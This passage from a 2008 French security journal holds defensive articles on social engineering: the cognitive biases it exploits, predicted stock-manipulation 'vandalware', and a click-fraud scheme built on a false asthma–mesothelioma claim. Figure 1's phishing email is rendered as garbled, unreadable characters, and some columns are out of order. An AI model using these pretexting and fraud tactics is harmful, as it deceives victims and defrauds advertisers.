Il ne faut nullement nous attendre à pouvoir reconnaître et
analyser tous les aspects de chaque individu, événement et
situation que nous rencontrons au quotidien. Nous n'en avons
ni le temps, ni l'énergie, ni la capacité. Nous devons par contre
souvent recourir à nos stéréotypes, nos règles empiriques, pour
classer les choses selon quelques caractéristiques clés, afin de
réagir spontanément lorsque l'un ou l'autre de ces éléments
déclencheurs se présentent.
Voyons à présent comment les experts en ingénierie sociale
peuvent susciter en nous ce type de réactions automatiques
dont ils tireront profit.
Déclenchement de biais cognitifs
Un biais cognitif est une erreur mentale résultant de la
simplification d'une stratégie de traitement de l'information10.
Lorsqu'une heuristique fonctionne mal, elle conduit à un biais.
L'ingénierie sociale bouscule nos heuristiques pour créer des
erreurs « graves et systématiques11.
Certains biais cognitifs qui peuvent expliquer la réussite de
procédés d'ingénierie sociale sont décrits ci-dessous :
t Biais de validation décisionnelle Le souvenir d'un choix que
l'on a effectué antérieurement lui attribue des aspects positifs
plus importants que ses aspects négatifs12. Un internaute peut
s'habituer à acheter des articles avec remise sur des sites de
vente en ligne lorsqu'il reçoit des e-mails de parrainage d'amis.
S'il reçoit un message de spam occasionnel qui ressemble
à une autre invitation d'achat, il risque de dévoiler ses
informations de carte de crédit sur un site web frauduleux.
t Biais de confirmation (d'hypothèse) L'individu cherche
à collecter des preuves et à interpréter les informations de
façon à confirmer son point de vue13. Prenons un exemple
hypothétique. Supposons que la société Acme conclue avec
Imprimissimo un contrat de maintenance de ses imprimantes, et
que les membres du personnel de gardiennage d'Imprimissimo
portent des chemises grises à longues manches avec des badges
nominatifs. Au fil du temps, les employés d'Acme s'habitueront
à voir les membres du personnel d'Imprimissimo dans leurs
uniformes et identifieront quiconque porte une chemise grise à
longues manches avec un badge comme un gardien. Un intrus
pourrait dont confectionner ou voler un uniforme Imprimissimo
afin de se faire passer pour un gardien. En raison du biais de
confirmation qui affecte les employés d'Acme, il est fort possible
que la légitimité de sa présence ne soit pas mise en cause.
t Effet d'exposition Nous sommes attachés aux choses (et
aux personnes) qui nous sont familières14. Les nouvelles de
catastrophes naturelles ou provoquées par l'Homme entraînent
souvent l'émergence de sites web de phishing qui exploitent
ce penchant15. Tous ceux qui aiment suivre l'info de près
pourraient se laisser piéger par des sites de phishing traitant
prétendument de l'actualité brûlante. La familiarité avec les
événements évoqués pourraient conduire les internautes
à baisser leur garde, sans envisager que ces sites sont
susceptibles d'avoir une nature malveillante.
t Ancrage L'individu met l'accent sur un élément identificateur
qui leur saute aux yeux lorsqu'il prend des décisions16. Un
logo d'une banque affiché de façon proéminente sur un site
web piraté risque de duper les internautes même si d'autres
indicateurs de sécurité révèlent la tromperie17.
Engendrement de schémas erronés
t Conformité, complaisance et obéissance Les pressions
Les psychologues sociaux définissent un « schéma » comme
une représentation mentale de la réalité sur laquelle nous nous
basons pour tirer des conclusions sur notre environnement.
L'on enseigne aux enfants qu'il faut être gentil envers autrui. Le
tristement célèbre expert en ingénierie sociale Kevin Mitnick a
fait remarquer que les auteurs d'attaques en sont conscients et
que leurs requêtes « paraissent à tel point raisonnables qu'elles
n'éveillent aucun soupçon de la part de la victime, tout en
sachant exploiter la confiance de cette dernière18 ». Ils exploitent
ainsi abusivement la structure de notre schéma social.
Quelques exemples de jugements sociaux erronés courants, ainsi
que la façon dont ils sont exploités par l'ingénierie sociale, sont
décrits ci-dessous :
t Erreur d'attribution fondamentale Ce biais consiste
à penser que les comportements d'autrui reflètent leurs
dispositions internes et permanentes19. Il survient lorsque la
première impression est trompeuse. Un expert en ingénierie
sociale s'efforcera soigneusement de laisser une première
impression très positive. L'auteur d'une attaque aura une
approche affable lorsqu'il émet une demande ou dominatrice
lorsqu'il veut forcer sa victime à faire quelque chose. La
victime potentielle ne se rend pas toujours compte que
son interlocuteur joue un rôle, que son comportement est
situationnel et que, pour lui, la fin justifie les moyens.
t Effet de saillance Dans un groupe d'individus, le sujet
considéré comme le plus ou le moins influent est celui qui
se remarque le plus20. L'expert en ingénierie sociale sait
parfaitement comment s'adapter à la situation et se fondre
dans le paysage. Il cherche à faire jouer l'effet de saillance en
sa faveur. Il peut très bien se présenter comme un client dans
un costume d'homme d'affaires ou comme un gardien en
uniforme, mais certainement pas comme un jongleur sur des
échasses. Tel un véritable caméléon, il change non seulement
de tenue et d'apparence, mais il adopte le jargon de la
société, s'informe sur ses événements, son personnel et prend
même l'accent régional. Par exemple, pour s'insinuer dans
une société, un escroc pourrait fort bien avoir appris qu'une
telle attend un bébé, et que Pierre, Paul ou Jacques est sur le
point de quitter l'entreprise, et échanger ces potins avec le
réceptionniste pour accéder aux bureaux en vue d'y effectuer
une prétendue « maintenance informatique ».
de conformité, de complaisance et d'obéissance entraînent
des changements dans les comportements des individus. De
nombreuses attaques d'ingénierie sociale peuvent s'expliquer
par les réponses prévisibles des victimes à ces pressions.
L'auteur d'une attaque peut par exemple prétendre être une
directrice en visite et faire pression sur un jeune gardien de
la sécurité pour qu'il l'autorise à entrer dans les locaux bien
qu'elle ne porte pas de badge d'accès. (La promesse d'une
récompense ou la menace de sanctions peuvent ajouter à la
pression.) Le gardien peut se sentir désarçonné et céder aux
instances de la soi-disant directrice. Des attaques d'ingénierie
sociale en groupe n'ont pas été observées, mais on peut
imaginer qu'elles existent. Afin de pénétrer dans un bureau,
par exemple, certains peuvent se faire passer pour des
travailleurs légitimes et faire pression tous ensemble auprès
d'un réceptionniste pour qu'il les laisse entrer, et qu'il « arrête
de leur faire perdre du temps ». Le malheureux risque fort
de céder, simplement pour éviter de se rendre impopulaire.
Une autre technique connue pour être utilisée par les
espions consiste à fréquenter la victime pendant quelque
temps. En premier lieu, l'auteur de l'attaque demande des
renseignements innocents à sa proie, puis s'intéresse à des
informations sensibles. La victime est prise au piège : elle se
sent obligée de se plier aux demandes puisqu'elle a cédé une
première fois, sans quoi elle risque de subir un chantage.
AUTOMNE 2008 11
Conclusion
La structure même de notre cerveau, et plus précisément les
interactions complexes entre les centres de l'émotion et de la
raison, fait que nous sommes vulnérables à l'ingénierie sociale.
Cette dernière consiste en une manipulation mentale des
sentiments de peur, de curiosité, de cupidité et d'empathie. Le
succès des attaques d'ingénierie sociale est dû aux biais cognitifs
et à des schémas sociaux erronés. Mais pourquoi ces informations
nous sont-elles si précieuses ?
Dans l'étude « Computer Crime and Security Survey » (Enquête
sur la sécurité et le crime informatiques) réalisée en 2007 par CSI,
seulement 13 % des répondants ont déclaré qu'ils contrôlaient
l'efficacité des formations de leur personnel contre les attaques
d'ingénierie sociale21. Ce pourcentage, certes déjà faible,
n'inclut pourtant pas les répondants qui ne disposent d'aucun
programme de formation de ce type.
Une première étape évidente consiste à mettre en place des
programmes de sensibilisation des utilisateurs aux dangers de
l'ingénierie sociale ainsi que des stratégies de sécurité spécifiques,
et à améliorer ceux-ci le cas échéant. Toute stratégie relative à
l'ingénierie sociale sera plus persuasive si elle est justifiée par des
recherches scientifiques. De même, les formations dispensées
aux utilisateurs seront plus efficaces si elles répertorient les biais
cognitifs généralement exploités dans le cadre de ces attaques
et si elles sont accompagnées de vidéos qui illustrent clairement
comment ces attaques tirent parti de chacun de nos biais cognitifs.
NOTES
1 « Bank loses $1.1M to online fraud » (Une banque perd 1,1 million de dollars lors d'une
fraude en ligne), BBC, 2007 — http://news.bbc.co.uk/2/hi/business/6279561.stm
2 Schneier B., « The Psychology of Security » (La psychologie de la sécurité), éd.
Essays and Op, 2007 — http://www.schneier.com/essay-155.html
3 ibid.
4 Asimov, I., « The Human Brain: Its Capacities and Functions » (Le cerveau humain,
ses capacités et fonctions), New York, Mentor Books, 1965 [traduction libre]
5 Johnson S., « Mind Wide Open: Your Brain and the Neuroscience of Everyday
Life » (L'esprit à livre ouvert : cerveau et neuroscience au quotidien), New York,
Scribner, 2004 [traduction libre]
6 Svoboda E., « Cultivating curiosity; how to explore the world: Developing a sense
of wonder can be its own reward » (Cultiver sa curiosité pour explorer le monde :
la capacité d'émerveillement peut être une récompense en soi), Psychology Today,
2006 — http://psychologytoday.com/articles/index.php?term=pto-4148.html
7 Leyden J., « Hackers debut malware loaded USB ruse » (Nouvelle ruse de
pirates : des clés USB chargées d'un logiciel malveillant), The Register, 2007 —
http://www.theregister.co.uk/2007/04/25/usb_malware/
8 Bibliothèque d'informations sur les virus McAfee : GPCoder.i, 9 juin 2008 —
http://vil.nai.com/vil/content/v_145334.htm
9 Cialdini R., « Influence: The Psychology of Persuasion » (Influence : la
psychologie de la persuasion), New York, HarperCollins, 1998 [traduction libre]
10 Heuer R. J., « The Psychology of Intelligence Analysis » (Psychologie de l'analyse
des renseignements), Center for the Study of Intelligence, CIA, 2002 —
http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html
11 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases »
(Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130,
1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
12 Mather M., Shafir E. et Johnson, M. K., « Misrememberance of options past:
Source monitoring and choice » (Distorsions dans la mémoire des options
passées : repérage des sources et choix), Psychological Science, 11, 132-138,
2000 — http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf
12 McAFEE SECURITY JOURNAL
On ne peut pas changer la nature humaine. Dès la naissance,
nos émotions sont séparées de notre raison, et nous sommes
donc sujets à commettre des erreurs mentales. Bien que ce
comportement soit normal, son exploitation par qui sait y faire
en matière d'ingénierie sociale se révèle dangereuse. Pour mieux
nous défendre contre ce type d'attaques, il est impératif de bien
comprendre la psychologie de l'ingénierie sociale et d'informer
correctement les utilisateurs sur ses effets.
Karthik Raman, professionnel certifié en matière de
sécurité des systèmes d'information, est chercheur
au sein de McAfee Avert Labs. Ses études portent
notamment sur l'analyse des vulnérabilités, la
sécurité des réseaux et la sécurité des logiciels. Outre
la sécurité, il s'intéresse également aux sciences
cognitives et sociales, ainsi qu'à la programmation
informatique. Parmi ses loisirs, citons le cricket, la
guitare et l'apprentissage des langues. Karthik Raman
est titulaire de licences en sciences informatiques et
en sécurité informatique de la Norwich University
(Vermont), qu'il a décrochées en 2006.
13 Nickerson R. S., « Confirmation Bias: A Ubiquitous Phenomenon in Many
Guises » (Biais de confirmation : un phénomène courant qui prend différentes
formes), Review of General Psychology, vol. 2, n° 2, 175-220, 1998 —
http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf
14 Zajonc R. B., « Attitudinal Effects of Mere Exposure » (Effet de simple
exposition — Changements attitudinaux), Journal of Personality and Social
Psychology, 9, 2, 1-27, 1968
15 Kaplan D., « Virginia Tech massacre may spawn phishing scams » (De nouvelles
escroqueries par phishing risquent de tirer parti du massacre à l'Université de
Virginia Tech), SC Magazine, 2007 — http://www.scmagazineuk.com/
Virginia-Tech-massacre-may-spawn-phishing-scams/article/105989/
16 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases »
(Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130,
1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
17 Dhamija R., Ozment A., Schecter S. « The Emperor's New Security Indicators:
An evaluation of website authentication and the effect of role playing on
usability studies » (Nouveaux indicateurs de sécurité d'Internet : évaluation de
l'authentification des sites web et effets d'un jeu de rôle sur les études de facilité
d'utilisation), 2008 — http://www.usablesecurity.org/emperor/
18 Mitnick K. D., Simon W. L., « The Art of Deception » (L'art de la supercherie),
Indianapolis, Wiley Publishing, Inc., 2002 [traduction libre]
19 Gilbert D. T. et Malone P. S., « The correspondence bias » (Le biais de
correspondance), Psychological Bulletin, 117, 21–38, 1995 —
http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20
(CORRESPONDENCE%20BIAS).pdf
20 Taylor S.E. et Fiske S. T., « Point of view and perception so causality » (Point de
vue, perception et causalité), Journal of Personality and Social Psychology, 32,
439-445, 1975
21 Computer Security Institute, CSI Computer Crime and Security Survey (Enquête
sur la sécurité et le crime informatiques), 2007 — http://www.gocsi.com/forms/
csi_survey.jhtml (inscription obligatoire)
L'ingénierie sociale
sur le Web : que nous
réserve l'avenir ?
Markus Jakobsson
Bien que l'ingénierie sociale existe probablement depuis l'aube de la civilisation, les
ravages qu'elle cause aujourd'hui en adaptant ses techniques à Internet suscitent de
nombreuses préoccupations. Cet article traite de l'évolution probable de ce phénomène.
Il est un fait que l'appât du gain est à l'origine de la déferlante
actuelle de logiciels criminels (crimewares). La tendance
d'aujourd'hui manifeste une rupture totale avec le passé. Les
premiers virus n'étaient autres que l'expression d'une curiosité
intellectuelle, du désir de compétition et, probablement, d'un
certain ennui. Les fraudes aux clics et les attaques par phishing
confirment ce changement : quelle pourrait en être la motivation
si ce n'est l'appât du gain ? — ces pratiques pouvant être de
fait fort lucratives. Il en va de même pour les différentes formes
de spam. Ce dernier n'existerait pas s'il n'était pas synonyme
de rentrées d'argent pour les spammeurs. Il paraît donc logique
d'examiner les différentes façons dont les cybercriminels
exploitent pour leur propre compte les diverses facettes d'Internet
afin de prévoir les tendances à venir en matière de fraude.
Fraude sur Internet : l'attaque sociotechnique
Les experts sont de plus en plus nombreux à admettre que la
cyberfraude ne se limite plus désormais au domaine technique,
mais qu'elle fait de plus en plus appel à l'ingénierie sociale. Le
phishing en est l'un des exemples les plus évocateurs, même s'il
n'est pas le seul. De nos jours, les attaques de logiciels criminels
qui recourent aux techniques d'ingénierie sociale sont de plus en
plus courantes. Citons par exemple l'arnaque récemment
perpétrée contre le Better Business Bureau (Bureau d'éthique
commerciale), illustrée à la figure 1. Lors de cette attaque par
phishing, une victime potentielle reçoit un e-mail semblant
provenir de cet organisme et signalant une réclamation contre
l'entreprise du destinataire. La pièce jointe, qui comporte
soi-disant les détails de la réclamation, contient en réalité un
téléchargeur de cheval de Troie. Pire encore, ces e-mails sont
généralement envoyés à des personnes haut placées dans la
hiérarchie de l'organisation visée, bien souvent des responsables
de la gestion des plaintes émanant des clients.
Les attaques s'adaptent aux mécanismes de défense
Du point de vue des cybercriminels, la fraude sur Internet est une
activité confortable et sans grand danger. En plus de leur garantir
des profits juteux et de leur offrir le choix de déterminer l'envergure
de leur attaque, elle permet également aux malfrats de « travailler »
librement à distance et leur assure une très faible traçabilité, et par
conséquent des risques fort limités. L'explosion de la cyberfraude n'a
donc rien d'étonnant. Mais pour bien comprendre le fonctionnement
de ces attaques, il faut d'abord analyser les mécanismes déployés
pour s'en prémunir. Aujourd'hui, la lutte contre la cybercriminalité
s'effectue à trois niveaux : par des fonctions techniques (par
exemple, logiciels antivirus, filtres antispam et plugins de navigateur
antiphishing) ; par des campagnes de sensibilisation telles que
celles du FTC, d'eBay, de SecurityCartoon.com, de banques et
l'initiative CUPS (CMU Usable Privacy and Security) des laboratoires
de Carnegie Mellon University, et enfin par des moyens légaux. Ces
derniers impliquent généralement l'identification de l'origine de la
fraude, la détection des « drop boxes » (boîtes de dépôt) et, enfin, la
traduction en justice des coupables.
Si le déploiement de moyens techniques et les mesures de
sensibilisation — lorsqu'ils donnent des résultats tangibles —
amenuisent les profits des criminels, les efforts légaux accroissent
les risques. Ces derniers sont considérables, en particulier au vu
de la croissance effrénée de la fraude sur Internet. Nous avons
donc de sérieuses raisons de penser que la cybercriminalité réagira
en développant des mécanismes visant à réduire ou à empêcher
la traçabilité des attaques. En partant de cette hypothèse, nous
chercherons à déterminer les conséquences futures possibles de
cette tendance. Pour cela, nous envisagerons deux types d'attaques
très difficilement traçables qui, même si elles n'ont encore jamais
eu lieu, ne tarderont sans doute pas à se manifester. Commençons
par analyser l'importance de l'aspect légal. Nous ferons pour cela
une légère digression afin d'examiner les raisons pour lesquelles les
logiciels de demande de rançons (ransomwares) n'ont jamais pris
l'ampleur et produit les effets désastreux que l'on craignait.
AUTOMNE 2008 13
Le fiasco des ransomwares
A la fin des années 1990, les chercheurs de l'Université de
Columbia ont émis l'hypothèse que la nouvelle vague de logiciels
malveillants pourraient tenter de réaliser des prises d'otage de
données : celles-ci seraient chiffrées au moyen d'une clé publique
véhiculée par un logiciel malveillant, leur « libération » étant
conditionnée au paiement d'une rançon contre divulgation de la
clé secrète, permettant l'accès aux fichiers chiffrés. Des années plus
tard, le cheval de Troie Archiveus a lancé une attaque semblable, à
la seule différence qu'il mettait en œuvre un chiffrement par clés
symétriques au lieu d'une clé publique. L'attaque a été déjouée
lorsqu'une ingénierie inverse a permis de démanteler le cheval de
Troie et d'extraire la clé de chiffrement/déchiffrement pour ensuite
la distribuer aux victimes. Cependant, l'attaque par Archiveus était
sans doute vouée à l'échec même si elle avait utilisé un chiffrement
par clé publique (qui, par nature, aurait empêché l'ingénierie
inverse de la clé de chiffrement à partir du code, puisque cette clé
n'aurait jamais été contenue dans le code). La raison de l'échec
probable n'est pas d'ordre technique, mais financier : en effet, les
criminels n'auraient eu aucun moyen de récupérer la rançon en
toute sécurité, sans être pistés.
L'offensive des logiciels de cybervandalisme
Partons de l'exemple des logiciels de demande de rançons
pour examiner un nouveau type d'attaque, celle des logiciels
de cybervandalisme (vandalwares). Ce n'est ni l'amusement ni
la provocation qui motive ce type de délinquance, mais plutôt
l'intérêt financier. Le cybervandale s'y prend en général de la façon
suivante : il commence par choisir l'entreprise qu'il va cibler, puis il
recourt à des techniques d'exploration de données pour collecter
autant d'informations détaillées que possible sur les travailleurs
vulnérables. Ces derniers sont ceux qui ont accès aux données
sensibles ou aux pages qui constituent la « devanture » du site
web de l'entreprise. L'employé vulnérable constitue pour les
vandales du Web une source précieuse d'informations, notamment
sur la structure interne de l'entreprise, les noms des personnes
occupant des postes importants et le format des adresses e-mail.
Ensuite, l'escroc achète des options de vente de l'entreprise (s'il
s'agit d'une société cotée en bourse). Une option de vente est
un instrument financier dont la valeur augmente si le cours de
l'action correspondante chute : elle permet aux investisseurs et
spéculateurs d'engranger des bénéfices dans la mesure où un titre
est sur le point de perdre de la valeur. Il est fort probable qu'en
plus du criminel, d'autres investisseurs acquièrent également
des options de vente, en particulier si l'action de l'entreprise
ciblée présente un volume de transactions raisonnable. Enfin,
$WWDFKHG\RXZLOO¿QGDFRS\RIWKHFRPSODLQW3OHDVHGRZQORDGDQG
le cybervandale lance l'attaque contre la société, en général
en envoyant à quelques travailleurs sélectionnés des e-mails
falsifiés semblant provenir d'un autre membre du personnel,
D'après vous, que se passe-t-il si quelqu'un ouvre ou exécute le
fichier joint ? Si l'e-mail ne finit pas dans le dossier de spam et si
le système antivirus ne le bloque pas, l'ordinateur est infecté ; un
ordinateur qui a accès à des données sensibles ou au site web de
l'entreprise. Pire encore, qu'arrive-t-il si ces données sensibles se
retrouvent exposées sur Internet, peut-être même sur le site web
de l'entreprise elle-même ? Tohu-bohu général, et dégringolade
du cours de l'action ! Le criminel remporte donc son pari : il ne
lui reste plus qu'à réaliser ses options de vente et à encaisser les
bénéfices sur l'action en chute libre. En procédant ainsi, l'auteur
de l'attaque reste totalement intraçable, puisqu'il se comporte de
la même façon que les autres investisseurs détenant des options
de vente. Qui est le coupable ? Personne n'est à même de le dire.
Falsification des clics
La fraude aux clics est un autre type courant de fraude en
ligne. Elle exploite le fait que lorsqu'un internaute clique sur
une annonce, l'annonceur paie une commission au site web
sur lequel est affichée l'annonce et au portail qui a fourni cette
dernière au site web. D'autres types de fraudes similaires tirent
parti de campagnes publicitaires qui entraînent un transfert
d'argent dès que l'internaute « voit » une bannière publicitaire
(qu'il effectue ou non une action), ou déclenchent une vente ou
une autre action quand celui-ci voit une annonce. Ces fraudes
ont pour objectif de ponctionner ces transferts d'argent (le
cybercriminel empoche pour chaque annonce affichée sur son
site web) ou de drainer les budgets publicitaires de concurrents
(si ces derniers sont les annonceurs qui paient pour les publicités).
Souvent, les escrocs génèrent du trafic de façon automatisée, de
sorte que les annonces semblent avoir été réellement visualisées
par des internautes. L'automatisation peut avoir recours à
une forme de logiciel malveillant, tel qu'un réseau de robots.
Autre approche courante : les malfaiteurs peuvent recruter des
« cliqueurs à gage » qui activeront des annonces sélectionnées.
Réclamation auprès du BBB
BBB CASE #569822971
&RPSODLQW¿OHGE\ 0LFKDHO7D\ORU
%XVLQHVV1DPH
&RPSODLQW¿OHGDJDLQVW &RQWDFW
%%%0HPEHU
&RPSODLQWVWDWXV 
&DWHJRU\ &RQWUDFW,VVXHV
&DVHRSHQHGGDWH 
&DVHFORVHGGDWH 
NHHSWKLVFRS\VR\RXFDQSULQWLWIRU\RXUUHFRUGV
2Q)HEUXDU\WKHFRQVXPHUSURYLGHGWKHIROORZLQJLQIRUPDWLRQ
7KHFRQVXPHULQGLFDWHGKHVKH','127UHFHLYHGDQ\UHVSRQVHIURPWKH
leur supérieur par exemple : « Bonjour Jacques, Pouvez-vous
examiner la présentation PowerPoint en pièce jointe et me dire
ce que vous en pensez ? Merci de bien vouloir me faire un bref
rapport sur la question pour demain matin. Je compte sur vous. »
Ou le soi-disant expéditeur peut être un administrateur système :
« Un nouveau virus informatique dangereux a été détecté, et nos
systèmes ne sont pas équipés des correctifs adéquats pour nous en
protéger. Veuillez installer immédiatement le programme ci-joint
sur votre ordinateur pour assurer notre sécurité. Effectuez cette
procédure le plus vite possible. »
14 McAFEE SECURITY JOURNAL
EXVLQHVV
7KHIRUP\RXXVHGWRUHJLVWHUWKLVFRPSODLQWLVGHVLJQHGWRLPSURYHSXEOLF
DFFHVVWRWKH%HWWHU%XVLQHVV%XUHDXRI&RQVXPHU3URWHFWLRQ&RQVXPHU
5HVSRQVH&HQWHUDQGLVYROXQWDU\7KURXJKWKLVIRUPFRQVXPHUVPD\
HOHFWURQLFDOO\UHJLVWHUDFRPSODLQWZLWKWKH%%%8QGHUWKH3DSHUZRUN
5HGXFWLRQ$FWDVDPHQGHGDQDJHQF\PD\FRQGXFWRUVSRQVRUDQGD
SHUVRQLVQRWUHTXLUHGWRUHVSRQGWRDFROOHFWLRQRILQIRUPDWLRQXQOHVVLW
GLVSOD\VDFXUUHQWO\YDOLG20%FRQWUROQXPEHU7KDWQXPEHULV
‹%%%RUJ$OO5LJKWV5HVHUYHG
&RPSODLQWBGRF!
Figure 1 : Escroquerie contre le Better Business Bureau. L'e-mail contient une pièce jointe
infectée, l'auteur de l'attaque espérant que celle-ci sera ouverte par le destinataire.
Examinons à présent la façon dont l'ingénierie sociale peut être
mise en œuvre dans le cadre d'une nouvelle attaque de type fraude
aux clics. (Précisons d'ailleurs à cette occasion que nous conservons
les mots clés en anglais et les valeurs en dollars, puisque les
exemples cités ne sont valables que pour le marché américain et la
langue anglaise.) Penchons-nous d'abord sur un premier scénario
courant qui ne constitue pas une fraude aux clics :
t Scénario 1 Site web standard. Imaginons un site web légitime
qui fournit un service et affiche des annonces liées à ce service.
Le contenu des annonces est généralement déterminé de
façon automatique par les portails d'annonces (tels que Google
et Yahoo), au travers de l'examen automatique du contenu du
site web et de la sélection d'annonces sur des thèmes associés
à ce contenu. Ainsi, un site web culinaire comportera des
annonces sur des machines à café, des casseroles et autres
ustensiles de cuisine. En général, les annonces de ces sites sont
destinées à générer du trafic et utilisent par conséquent des
mots clés comme « couteau », « calphalon », « teflon » et
d'autres termes similaires. Ce type de site n'a rien d'inhabituel.
t Scénario 2 Arbitrage. Prenons à présent un site web
comportant du contenu qui sélectionne des annonces
correspondant aux mots clés « find a attorney », qui signifie
« rechercher un avocat ». (L'utilisation de l'article « a » plutôt
que « an », qui serait l'option grammaticalement correcte, n'est
pas un hasard. Les raisons de ce choix vous sont expliquées
plus loin.) La sélection des annonces est possible grâce à la
présence dans le site d'une grande quantité de texte (visible ou
non) où cette expression se répète. Au moment de la rédaction
de cet article, le coût d'une stratégie de ce genre oscillait entre
1,07 et 7,05 dollars. Le prix exact dépend de la localisation et
de la langue du site, de l'heure du jour et, bien entendu, des
offres concurrentes soumises pour ces mots clés car les valeurs
des mots clés sont établies suivant un système d'enchères. Par
conséquent, si un utilisateur clique sur une annonce de ce site,
le propriétaire de l'annonce paiera le montant correspondant
au portail, qui à son tour devra transférer le montant (moins la
commission) au site web sur lequel l'annonce est affichée.
Imaginons maintenant que ce site place une annonce utilisant
les mots clés « find an attorney », qui signifie également
« rechercher un avocat ». La seule différence par rapport
à l'exemple précédent réside dans l'utilisation de l'article
« an » au lieu de « a » : cette combinaison de mots clés, plus
courante, présente une fourchette de prix inférieure, qui varie
entre 0,87 et 3,82 dollars. Nous supposerons que le site web
paie 2 dollars pour chaque visiteur qu'il amène et en reçoit
4 pour chaque visiteur qui clique sur une annonce du site.
Dans la mesure où 50 % des visiteurs qui arrivent via l'annonce
à 2 dollars cliquent sur une annonce à 4 dollars, le site réalise
un bénéfice sans fournir aucun service. C'est ce que l'on
appelle « arbitrage de mots clés ». Et comme nous allons le
constater, cette approche frise la fraude aux clics même si elle
n'en constitue pas véritablement une.
t Scénario 3 Attaque par ingénierie sociale. Voyons à présent
comment un escroc peut appliquer l'ingénierie sociale à la
technique d'arbitrage afin d'amasser une petite fortune.
Supposons qu'il mette sur pied un site web qui génère le mot clé
« mesothelioma » (mésothéliome), une forme rare de cancer
causée par l'exposition à l'amiante. Au moment de la rédaction de
cet article, la valeur du mot clé « mesothelioma » sur Google était
de 63,42 dollars. L'escroc achète en outre le mot clé « asthma »
(asthme) au prix de 0,10 dollar pour générer du trafic vers son site.
Dès que le nombre de visiteurs arrivant sur son site après avoir
cliqué sur l'annonce correspondant au mot clé « mesothelioma »
atteint le nombre de 634, il réalise un bénéfice. Mais comment ces
visiteurs sont-ils amenés à cliquer sur l'annonce ? Supposons que
le site web contienne simplement un article soi-disant rédigé par
un médecin et dont le sujet est « Saviez-vous que 10 pour cent
des asthmatiques risquent de contracter un mésothéliome ? ».
Même si cette affirmation est mensongère, de nombreuses
personnes concernées par l'asthme et qui ne savent pas
exactement ce qu'est un mésothéliome feront exactement ce que
veut l'escroc, à savoir cliquer sur l'annonce. Supposons qu'un
visiteur sur deux se laisse prendre au piège. Si le site compte mille
visiteurs par jour, le cybercriminel engrangera chaque jour un petit
magot de plus de 30 000 dollars. Et même avec des mots clés
moins évidents, ses gains seront plus qu'appréciables.
Ces trois scénarios diffèrent par leur intention et par leur emploi
de l'ingénierie sociale. Du point de vue du fournisseur d'annonces,
néanmoins, ils sont très similaires dans leur structure. Le visiteur arrive
sur le site, lit son contenu et clique sur une annonce. Bien qu'il soit
possible de mettre en corrélation les mots clés entrants et sortants
pour détecter les anomalies, les malfaiteurs peuvent faire appel à
deux fournisseurs de services différents pour générer respectivement
le trafic entrant et le trafic sortant. Cette stratégie rend difficile la
détection et le blocage de ce type d'attaque, en particulier si elle est
réalisée à petite échelle, mais sur un grand nombre de sites.
Conclusion
L'ingénierie sociale sur Internet est désormais solidement et
durablement ancrée. Nous avons déjà pu mesurer l'ampleur de
ses effets dévastateurs lorsqu'elle est appliquée aux arnaques par
phishing. Elle commence en outre à être exploitée pour améliorer
l'efficacité du spam et des logiciels criminels. Dans un avenir
proche, il faudra malheureusement s'attendre aussi à la progression
de certaines applications de l'ingénierie sociale exigeant des
compétences plus pointues à des fins frauduleuses, par exemple
la fraude aux clics. Nous pouvons concevoir des contre-mesures
techniques qui prennent en compte cette tendance. De plus, une
meilleure compréhension des diverses formes possibles d'attaques
nous aidera à améliorer les mécanismes de défense mis en œuvre.
Toutefois, il nous faut également être conscient du fait que notre
stratégie nécessite des interfaces utilisateur améliorées, des
procédures plus rigoureuses, une réglementation plus stricte ainsi
qu'une plus grande sensibilisation. En tant qu'experts en sécurité,
la route est encore longue.
Markus Jakobsson est chercheur au Palo Alto
Research Center. Ses études portent sur le phishing
et les contre-mesures, la fraude aux clics, l'influence
du facteur humain sur la sécurité, la cryptographie,
la sécurité des réseaux et la conception des
protocoles. Il est corédacteur de l'ouvrage Phishing
and Countermeasures (Phishing et contre-mesures),
publié aux éditions Wiley en 2006, et co-auteur de
Crimeware : Understanding New Attacks and Defenses
(Logiciels criminels : nouvelles attaques et menaces),
publié aux éditions Symantec Press en 2008.
Image fournie gracieusement par PARC, photographe : Brian Tramontana
AUTOMNE 2008 15
Une cible de choix
pour les logiciels
d'ingénierie sociale
Elodie Grandjean
Les auteurs de logiciels malveillants ont souvent recours à des techniques
d'ingénierie sociale pour infecter directement un système ou un hôte, ou pour
lancer le téléchargement et l'exécution en cascade de logiciels malveillants.
La plupart d'entre nous ont déjà reçu un e-mail concernant une
importante mise à jour de sécurité ou un message émanant
d'une ancienne connaissance désireuse de renouer le contact, qui
contenaient en réalité une pièce jointe ou une URL malveillante.
Ne croyez pas que les e-mails constituent le seul vecteur de
propagation des logiciels malveillants à l'aide des techniques
d'ingénierie sociale. Il existe une pléthore d'autres ruses,
recourant notamment aux très populaires services de messagerie
instantanée. Si son système a été compromis, un ami peut vous
envoyer un message dans lequel il vous invite à regarder des
photos, accompagné d'une URL pointant vers un fichier. Vous
faites naturellement confiance au contact sans savoir que son
système est infecté. Et dans de nombreux cas, l'URL vous redirige
vers un logiciel malveillant.
D'autres logiciels malveillants font appel à l'ingénierie sociale
pour s'emparer d'informations confidentielles, dont les références
de connexion, les numéros de carte de crédit, etc. Ces techniques
sont généralement utilisées dans le cadre d'attaques par phishing
ou d'intrusions sur les serveurs.
Parmi les sujets évoqués par les spécialistes de l'ingénierie sociale
pour appâter leurs victimes, les plus souvent utilisés sont les
services « pour adultes ». En voici quelques autres, étant entendu
que la liste est loin d'être exhaustive :
t Liens et images pornographiques
t Utilisation d'un nom de femme dans le champ de l'expéditeur
t Programmes politiques, y compris demandes de don pour un
parti ou un candidat populaire
16 McAFEE SECURITY JOURNAL
t Faux e-mails émanant de banques, de services de paiement
en ligne et d'autres services financiers qui demandent une
confirmation ou une mise à jour des références de connexion
ou des informations de carte de crédit
t E-mails de menace, mentionnant des peines d'emprisonnement
ou des appels à des fonctions de juré
t Jeux et économiseurs d'écran gratuits contenant un cheval de
